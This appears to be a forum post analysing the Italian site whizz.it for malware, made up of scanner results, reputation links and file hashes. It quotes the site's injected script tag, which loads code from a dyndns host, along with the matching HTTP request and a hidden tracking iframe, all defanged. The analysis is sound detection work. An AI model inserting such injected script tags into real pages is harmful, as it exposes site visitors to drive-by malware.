See IDS alert: http://urlquery.net/report.php?id=7181581
malware from same IP & Listed on PHISHWatch
3 instances of malcode alive and low detection rate: http://support.clean-mx.de/clean-mx/viruses.php?ip=195.110.124.133&sort=first%20desc
DrWeb detects it there as infested with JS.IFrame.514
Web rep: http://www.mywot.com/en/scorecard/whizz.it
Injection check: Suspicious Text after HTML - <script language=‘javascript’ src=hxtp://w5v3fjum97.dyndns.info/infob.php?i=24541>
- URLs and sub domains distributing the malware or acting as a redirector: sucuri blacklisted!
GET /infob.php?i=24541 HTTP/1.1
Host: w5v3fjum97 dot dyndns dot info **
External links check:
htxp://www.discoveritalia.it → ‘discoveritalia .it’
htxp://www.ideabook.it → ‘ideabook’
htxp://www.bbgglobalch.com → ‘bbg global, ag’
htxp://www.isnart.it/ → ‘isnart’
htxp://www.deagostini.it → ‘istitituto geografico de agost’
htxp://www.federalberghi.it/attivita.asp → ‘www.federalberghi.it’
htxp://www.confcommercio.it/home/confturism/index_ie.html → ‘www.confrutismo.it’
htxp://www.federterme.it/ → ‘www.federterme.it’
htxp://www.confindustria.it/ → ‘www.confindustria.it’
htxp://www.aica-italia.it/ → ’ ’
htxp://www.federalberghiroma.it/ → ‘www.federalberghiroma.it’
htxp://www.regione.lazio.it → ‘www.regione.lazio.it’
htxp://www.isnart.it → ‘www.isnart.it’
htxp://www.faita.it → ‘www.faita.it’
Suspicious external script via Zulu Zscaler: http://jsunpack.jeek.org/?report=f284354134f054793f95b1aa65eaa77e5c922904 (not found)
Suspicious external script, idem: htxp://5z535qer82.dyndns.info/infob.php?i=24541 → http://jsunpack.jeek.org/?report=840d60f8e1840065c1e70fd22f8c201517771d4b **
on this see: vdog.tv/?source=traf5&medium=cpm benign
[nothing detected] (iframe) vdog dot tv/?source=traf5&medium=cpm
status: (referer=5z535qer82.dyndns.info/slb.php?i=24541)saved 5757 bytes 749aba553b4eada16762728abe959438e6cecacf
info: [script] vdog dot tv/js/jquery.min.js
info: [script] vdog dot tv/js/jNotify.jquery.js
info: [img] vdog dot tv/images/screen.jpg
info: [iframe] mediarouting.com/ads ?? poor web rep: http://www.mywot.com/en/scorecard/mediaroute.de?utm_source=addon&utm_content=popup-donuts
info: [decodingLevel=0] found JavaScript
suspicious:
given clean here: http://evuln.com/tools/malware-scanner/whizz.it/
Quttera flags as suspicious:
conversionlab.trackset.com/track/tsends.js
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Procedure: + has been called with a string containing hidden [iframe] tag ‘<iframe src=https://conversionlab.trackset.com/track/cl.gif?md5=32%26ck_abil=0%26ris=x%26lang=%26keyword=%26cr’ to conversionlab.trackset.com
Threat dump: View code here http://www.quttera.com/detailed_report/whizz.it#myModalSusp3938C4368B75D488FB758E653AC864BE
and here: http://jsunpack.jeek.org/?report=509b8002201e4fa8da4eb6b99ba9b845961b1117
File size[byte]: 14326
File type: ASCII
MD5: 3938C4368B75D488FB758E653AC864BE
Scan duration[sec]: 0.205000
polonus